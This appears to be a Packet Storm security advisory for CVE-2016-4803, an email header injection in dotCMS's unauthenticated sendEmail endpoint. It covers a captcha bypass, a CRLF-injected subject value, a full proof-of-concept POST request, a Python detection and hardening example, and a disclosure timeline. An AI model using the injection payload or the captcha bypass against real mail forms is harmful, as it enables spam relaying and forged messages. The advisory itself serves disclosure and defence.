dotCMS Email Header Injection

Elar Lang, packetstormsecurity.com, May 25, 2016 (PACKETSTORM:137179)

EPSS: 0.004 (Low), percentile 74.3%

Title: CVE-2016-4803 dotCMS - Email Header Injection  
Credit: Elar Lang / https://security.elarlang.eu  
Vulnerability: Email Header Injection  
Vulnerable version: before 3.5 / 3.3.2  
CVE: CVE-2016-4803  
Vendor: dotCMS (http://dotcms.com/)  
  
  
# Description  
dotCMS exposes email-sending functionality at the path /dotCMS/sendEmail/.  
Some of its parameters are vulnerable to Email Header Injection.  
  
  
# Preconditions  
There is no pre-condition on authentication or on authorization to  
access this functionality.  
  
If captcha is required for the web page, then the only precondition  
would be captcha. However, captcha is renewed only when you access the  
captcha image - in other words, you can load it once and manually set  
the correct value. After this step the "captcha effect" is bypassed.  
  
  
# Proof-of-Concept  
Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1  
on 7th of December 2015.  
  
## Value for subject (%0D%0A is for \r\n):  
subject=subject%0D%0AX-PoC-of-New-Line%3A+True  
  
  
## Proof-of-Concept POST request:  
<code>  
POST /dotCMS/sendEmail HTTP/1.1  
Host: demo2.dotcms.com  
...  
Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ...  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 218  
  
from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send  
</code>  
  
  
## Received email source:  
<code>  
Message-ID: <[email protected]>  
From: myemail  
To: youremail  
Subject: subject  
X-PoC-of-New-Line: True  
MIME-Version: 1.0  
Content-Type: multipart/alternative;  
boundary="----=_Part_4_698773753.1449476889786"  
X-RecipientId: null  
Date: Mon, 7 Dec 2015 03:28:09 -0500 (EST)  
  
------=_Part_4_698773753.1449476889786  
Content-Type: text/plain; charset=us-ascii  
Content-Transfer-Encoding: 7bit  
  
... removed ...  
</code>  
  
  
## Result  
  
From the received email source, it is visible that the subject value  
created 2 different lines:  
<code>  
Subject: subject  
X-PoC-of-New-Line: True  
</code>  
  
Proof-of-Concept on how to send a multipart email with an attachment  
and a more detailed description is available at:  
https://security.elarlang.eu/cve-2016-4803-dotcms-email-header-injection-vulnerability-full-disclosure.html  
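The mechanism behind the result above (a CRLF inside one form value ending the Subject header and starting a new one) and the corresponding fix are shown below in an added example. This is editor-supplied Python, not dotCMS code; the form body is the advisory's own PoC parameters, reduced to the fields that matter, and the `build_headers_*` functions are a hypothetical mail-building routine standing in for the application's sendEmail handler.

```python
import re
from urllib.parse import parse_qs

# Constructed sample input: the form body from the advisory's PoC request,
# with %0D%0A (CRLF) embedded in the subject parameter.
POC_BODY = (
    "from=myemail&to=youremail"
    "&subject=subject%0D%0AX-PoC-of-New-Line%3A+True"
    "&comments=some+content"
)

HEADER_FIELDS = ("from", "to", "subject")   # form fields copied into headers
CRLF_RE = re.compile(r"[\r\n]")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def build_headers_naive(form):
    """Vulnerable pattern (hypothetical stand-in for the sendEmail handler):
    form values are written into the header block verbatim, so a CRLF inside
    a value terminates that header and whatever follows becomes a new one."""
    lines = [f"{name.capitalize()}: {form[name]}" for name in HEADER_FIELDS]
    return "\r\n".join(lines) + "\r\n\r\n" + form.get("comments", "")


def header_names(raw_message):
    """Header names a receiving MTA/MUA would see, as in the advisory's
    'received email source'. The header block ends at the first empty line."""
    header_block = raw_message.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in header_block.split("\r\n")]


def find_injected_fields(form):
    """Detection: which header-bound form fields carry a CR or LF."""
    return [name for name in HEADER_FIELDS if CRLF_RE.search(form.get(name, ""))]


def build_headers_hardened(form):
    """Hardened pattern: refuse any header value containing CR/LF instead of
    trying to strip it (rejecting is simpler to reason about than sanitising)."""
    bad = find_injected_fields(form)
    if bad:
        raise ValueError(f"CR/LF not allowed in header field(s): {bad}")
    return build_headers_naive(form)


if __name__ == "__main__":
    form = parse_form(POC_BODY)
    # Naive builder: the single subject value yields two header lines.
    print(header_names(build_headers_naive(form)))
    print(find_injected_fields(form))
    try:
        build_headers_hardened(form)
    except ValueError as exc:
        print("rejected:", exc)
```

The same `find_injected_fields` check can be run over web-server request logs or WAF-captured form bodies to flag attempts; legitimate subjects never contain a raw CR or LF.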
  
  
# Vulnerability Disclosure Timeline  
  
2015-12-04 .. 07 | me | detected vulnerability, wrote Proof-of-Concept  
2015-12-07 | me > dotCMS | sent a letter with detailed description of  
email header injection and some related vulnerabilities  
2015-12-14 | me > dotCMS | sent another letter with SQL injections  
vulnerabilities and asked feedback about "email header injection"  
vulnerabilities  
2015-12-14 | dotCMS > me | they were going to review my emails and  
asked to resend "email header injection" description  
2015-12-14 | me > dotCMS | I resent "email header injection" description  
2015-12-14 | dotCMS > me | they were planning fixes in upcoming  
release, estimated to beginning of 2016. They thanked and wrote  
"security is something we take seriously"  
  
2016-04-07 | me > dotCMS | 5 months since first report, what is the  
situation with reported vulnerabilities?  
2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by  
sanitizing and email header injection #8841"  
2016-04-07 | dotCMS > me | email header injection will be fixed in  
3.5, which is estimated to be out in mid-April  
  
2016-04-19 | dotCMS | dotCMS version 3.5 release  
2016-05-09 | me > dotCMS | asked confirmation and version numbers  
about fixes for CVE and Full Disclosure  
2016-05-10 | dotCMS > me | email header injection is fixed in versions  
3.5 and 3.3.2.  
2016-05-10 | dotCMS | dotCMS version 3.3.2 release  
2016-05-24 | me | Full Disclosure on security.elarlang.eu  
  
  
# Fixes  
Update dotCMS at least to version 3.5 or 3.3.2.  
  
https://dotcms.com/docs/latest/change-log#release-3.5  
https://dotcms.com/docs/latest/change-log#release-3.3.2  
  
--  
Elar Lang  
Blog @ https://security.elarlang.eu  
Pentester, lecturer @ http://www.clarifiedsecurity.com  
  
  